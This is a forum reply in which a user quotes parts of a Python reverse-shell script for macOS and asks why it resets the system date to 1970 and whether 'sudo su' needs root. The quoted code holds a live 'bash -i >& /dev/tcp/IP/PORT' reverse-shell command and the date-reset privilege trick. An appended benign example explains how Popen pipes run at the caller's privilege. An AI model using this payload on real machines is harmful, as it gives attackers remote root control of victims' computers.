I will scream at the next person who tells me Macs are secure!
RE: I will scream at the next person who tells me Macs are secure! #12
Code:
#!/usr/bin/python
##Various comments##
import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
OK, from the Python documentation for 3.2.2:
Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.
and
Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.

If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.

If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.
So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.
Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))
##More various junk###
First, what's with the date? Is it really necessary to -setdate 01:01:1970?
Second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help? :(

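An added example, not from the original post or from the script it quotes, showing what subprocess.Popen with piped stdin/stdout/stderr actually does when you feed a shell commands the way the quoted script does: the commands land in a child shell running as the same user as the parent Python process (the child's `id -u` equals the parent's), and the shell's output comes back through the stdout pipe only once it is read. It also shows the part the quoted fragment leaves out: after writing to proc.stdin you have to flush or close it, or the shell sits waiting for more input. Assumptions: a POSIX shell is available (bash is used if found, otherwise /bin/sh); no reverse connection is made and nothing here changes privileges.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): drive a shell through
subprocess.Popen pipes and observe which user the commands run as."""
import os
import shutil
import subprocess


def run_in_shell(commands, shell=None):
    """Feed each command line to a non-interactive shell over stdin.

    Returns (stdout, stderr, exit_status). shell=None picks bash if it is
    on PATH, otherwise /bin/sh (assumption: a POSIX shell exists).
    """
    if shell is None:
        shell = shutil.which("bash") or "/bin/sh"
    proc = subprocess.Popen(
        [shell],                  # argv list; shell=False, so no "/bin/sh -c" wrapper
        stdin=subprocess.PIPE,    # we write commands here
        stdout=subprocess.PIPE,   # the shell's output comes back here
        stderr=subprocess.PIPE,   # and its errors here
        text=True,                # str in/out instead of bytes
    )
    script = "".join(cmd + "\n" for cmd in commands)
    # communicate() writes the script, closes stdin (so the shell sees EOF
    # and exits) and drains both pipes. Just calling proc.stdin.write()
    # without flush/close leaves the shell blocked waiting for input and
    # the parent blocked on read(): the pipe is buffered in both directions.
    out, err = proc.communicate(script)
    return out, err, proc.returncode


def child_shell_uid():
    """Ask the child shell which uid it runs as."""
    out, _, _ = run_in_shell(["id -u"])
    return int(out.strip())


def child_runs_as_parent_user():
    """True when the piped shell has exactly the parent's effective uid,
    i.e. Popen('bash') grants no privilege the caller did not already have."""
    return child_shell_uid() == os.geteuid()


if __name__ == "__main__":
    out, err, rc = run_in_shell(["echo hello from the child", "id -u", "exit 3"])
    print(out, end="")
    print("stderr:", repr(err))
    print("exit status:", rc)
    print("child runs as parent user:", child_runs_as_parent_user())
```

The takeaway for the question in the post: the Popen call itself gives you a shell at the privilege of whoever runs the script, nothing more; any elevation has to come from what is later written into that shell, and whether that succeeds depends on sudo, not on the pipes.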
Messages In This Thread
RE: I will scream at the next person who tells me Macs are secure! - by 3SidedSquare - 10-20-2013, 12:49 AM